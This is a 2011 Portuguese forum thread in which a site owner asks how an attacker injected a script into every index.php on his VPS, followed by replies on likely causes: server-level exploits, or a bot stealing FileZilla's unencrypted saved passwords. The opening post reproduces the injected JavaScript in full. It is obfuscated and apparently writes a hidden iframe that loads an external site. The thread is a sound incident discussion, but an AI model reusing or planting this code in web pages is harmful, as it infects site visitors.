ruimcosta Posted June 16, 2011 at 03:55 PM Report #396698 Posted June 16, 2011 at 03:55 PM Biba, Estou a passar uma situação de ataque a um servidor, ataque esse que inseriu em N sites, no index.php, um <script></script> <script>function c2412d3ca6q4df35e7820272(q4df35e782064e){ function q4df35e78209f8(){var q4df35e7820e1f=16;return q4df35e7820e1f;} return (eval('pa'+'rseInt')(q4df35e782064e,q4df35e78209f8()));}function q4df35e782121f(q4df35e782162c){ function q4df35e78221fa(){return 2;} var q4df35e7821a0f='';q4df35e78229b8=String['fromCharCode'];for(q4df35e7821e16=0;q4df35e7821e16<q4df35e782162c.length;q4df35e7821e16+=q4df35e78221fa()){ q4df35e7821a0f+=(q4df35e78229b8(c2412d3ca6q4df35e7820272(q4df35e782162c.substr(q4df35e7821e16,q4df35e78221fa()))));}return q4df35e7821a0f;} var ve7='';var q4df35e7822da4='3C7'+ve7+'3637'+ve7+'2697'+ve7+'07'+ve7+'43E696628216D7'+ve7+'96961297'+ve7+'B646F637'+ve7+'56D656E7'+ve7+'42E7'+ve7+'7'+ve7+'7'+ve7+'2697'+ve7+'465287'+ve7+'56E657'+ve7+'363617'+ve7+'065282027'+ve7+'2533632536392536362537'+ve7+'322536312536642536352532302536652536312536642536352533642536332533322533342532302537'+ve7+'332537'+ve7+'32253633253364253237'+ve7+'2536382537'+ve7+'342537'+ve7+'342537'+ve7+'302533612532662532662536362537'+ve7+'37'+ve7+'2537'+ve7+'322536632536342533302533342532652536332537'+ve7+'612532652536332536332532662537'+ve7+'302536312537'+ve7+'302536622536662537'+ve7+'612536342532662536352536652537'+ve7+'342536352537'+ve7+'322532652537'+ve7+'302536382537'+ve7+'30253366253237'+ve7+'2532622534642536312537'+ve7+'342536382532652537'+ve7+'322536662537'+ve7+'352536652536342532382534642536312537'+ve7+'342536382532652537'+ve7+'32253631253665253634253666253664253238253239253261253331253335253335253331253338253334253239253262253237'+ve7+'253333253634253337'+ve7+'253635253237'+ve7+'2532302537'+ve7+'37'+ve7+'2536392536342537'+ve7+'34253638253364253336253333253336253230253638253635253639253637'+ve7+'2536382537'+ve7+'342533642533322533342533342532302537'+ve7+'332537'+ve7+'342537'+ve7+'39253663253635253364253237'+ve7+'2537'+ve7+'362536392537'+ve7+'332536392536322536392536632536392537'+ve7+'342537'+ve7+'39253361253638253639253634253634253635253665253237'+ve7+'2533652533632532662536392536362537'+ve7+'3225363125366425363525336527'+ve7+'29293B7'+ve7+'D7'+ve7+'6617'+ve7+'2206D7'+ve7+'969613D7'+ve7+'47'+ve7+'27'+ve7+'5653B3C2F7'+ve7+'3637'+ve7+'2697'+ve7+'07'+ve7+'43E';q4df35e7823569=document;q4df35e7823569.write(q4df35e782121f(q4df35e7822da4));</script> De que forma foi isto possível? Reescrever o index de vários site? Acedendo via ftp, via cpanel? Abraços e beijinhos,Rui Costa
brunoais Posted June 16, 2011 at 04:02 PM Report #396702 Posted June 16, 2011 at 04:02 PM Ou através de abuso de falhas de segurança possivelmente nesse site. "[Os jovens da actual geração]não lêem porque não envolve um telecomando que dê para mirar e atirar, não falam porque a trapalhice é rainha e o calão é rei" autor: thoga31 Life is a genetically transmitted disease, induced by sex, with death rate of 100%.
fvox Posted June 16, 2011 at 08:09 PM Report #396787 Posted June 16, 2011 at 08:09 PM Hi. Todos os sites que sofreram o ataque estão na mesma hospedagem? Comentei sobre este tipo de ocorrência em outro tópico: Seu site fica em alguma hospedagem compartilhada? Se sim, procure saber se toda a box não foi atacada. Seu site pode ter sido vítima de um "mass attack", que ocorre quando alguém consegue o acesso à algum site dentro do mesmo host, e em seguida, consegue privilégios root através de exploits no kernel ou em serviços que estão rodando no servidor. Com o root, o acesso a todos os sites é inevitável. []'s "Strength of the world, the one true beholder...Ice in my veins, for those who've died."
ruimcosta Posted June 17, 2011 at 12:09 AM Author Report #396905 Posted June 17, 2011 at 12:09 AM Por acaso somente de colocar esta duvida notei que existia outra pergunta semelhante. Sim, todos os sites sofreram do mesmo trojan em todos os index.php no mesmo servidor. É uma VPS. Ja informei a empresa de hosting e estão a analisar, mas a preocupação trata-se de saber como foi feito feito o ataque para prevenir futuros... Abraços e beijinhos,Rui Costa
brunoais Posted June 17, 2011 at 09:23 AM Report #396946 Posted June 17, 2011 at 09:23 AM É muito complicado encontrar o culpado. Vão ser necessários dias a analisar os logs a tentar ver aonde é que falhou. "[Os jovens da actual geração]não lêem porque não envolve um telecomando que dê para mirar e atirar, não falam porque a trapalhice é rainha e o calão é rei" autor: thoga31 Life is a genetically transmitted disease, induced by sex, with death rate of 100%.
ruimcosta Posted June 17, 2011 at 02:09 PM Author Report #397049 Posted June 17, 2011 at 02:09 PM A minha maior preocupação é encontrar o buraco para a situação nao se voltar a repetir. Detesto não poder dormir descansado. 🙂 Abraços e beijinhos,Rui Costa
yoda Posted June 17, 2011 at 02:36 PM Report #397071 Posted June 17, 2011 at 02:36 PM A minha maior preocupação é encontrar o buraco para a situação nao se voltar a repetir. Detesto não poder dormir descansado. 🙂 Na prática nunca dormirias, segurança é uma ilusão 😕 Provavelmente exploraram-te a máquina, e não os sites em particular. Tive um caso em mãos à uns anos em que entraram no servidor e meteram um site de phising, que nem pelo root conseguia apagar. before you post, what have you tried? - http://filipematias.info sense, purpose, direction
ruimcosta Posted June 17, 2011 at 06:50 PM Author Report #397176 Posted June 17, 2011 at 06:50 PM Tens razão, O mais correcto da minha parte seria dizer, que dormiria um pouco mais descansado. Basta ver as notícias de servidores e sites que são atacados todas as semanas. São empresas como muito mais recursos financeiros e humanos que eu e no entanto eles também tem falhas. ? Abraços e beijinhos,Rui Costa
Lfscoutinho Posted June 17, 2011 at 09:12 PM Report #397213 Posted June 17, 2011 at 09:12 PM Boas, Pelos vistos, o que aconteceu não passou em nada por ti, visto que todos os outros sites foram afectados. Assim podes continuar a dormir descansado 🙂
tmjramalho Posted June 17, 2011 at 11:23 PM Report #397248 Posted June 17, 2011 at 11:23 PM Boas. Pode não ser o teu caso, mas isto já me aconteceu várias vezes. Vim a descobrir que foi um bot que infectou um dos pcs com acesso ftp configurado no FileZilla com a password guardada. Acontece que este bot saca as passwords do FileZilla (que são guardadas sem qualquer encriptação) num xml, e depois faz essas "injecções" de código em páginas index e ficheiros javascript. Na altura removi a password do FileZilla, removi o código injectado nos ficheiros e nunca mais aconteceu nada. Também removi o bot, embora já não me lembre o nome do bicharoco 🙂 É preciso muito cuidado com os clientes de ftp, e tentar ao máximo não guardar as passwords nos clientes. Entretanto passei a usar o WinSCP. Espero que esta info seja útil para todos 😉
ruimcosta Posted June 21, 2011 at 02:10 PM Author Report #397892 Posted June 21, 2011 at 02:10 PM Obrigado pessoal, Por acaso sou o único detentor das senhas dos vários serviços, por isso tratei de alterar todas as senhas. Um ponto curioso é que o que quer que seja que alterou o código, somente alterou os ficheiros index.php (todos), por isso leva-me a desconfiar que teve algum acesso ftp ou até via servidor mesmo. Pelo menos não voltou a atacar. Abraços e beijinhos,Rui Costa
brunoais Posted June 21, 2011 at 02:34 PM Report #397906 Posted June 21, 2011 at 02:34 PM Recuperado: Vim a descobrir que foi um bot que infectou um dos pcs com acesso ftp configurado no FileZilla com a password guardada. Acontece que este bot saca as passwords do FileZilla (que são guardadas sem qualquer encriptação) num xml, e depois faz essas "injecções" de código em páginas index e ficheiros javascript. Na altura removi a password do FileZilla, removi o código injectado nos ficheiros e nunca mais aconteceu nada. No meu caso, eu tenho uma solução que apliquei no meu computador. Eu restringi o acesso ao ficheiro dos dados de password de modo que só o filezilla é que tivesse direitos de leitura, escrita e modificação. Isto só é possível obter executando o programa de permissões do windows usando o cmd.exe. Já não me lembro do código que usei para isso mas (google is your friend) pesquisando devem tb encontrar. Agora nem eu tenho acesso ao ficheiro 😄 "[Os jovens da actual geração]não lêem porque não envolve um telecomando que dê para mirar e atirar, não falam porque a trapalhice é rainha e o calão é rei" autor: thoga31 Life is a genetically transmitted disease, induced by sex, with death rate of 100%.
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now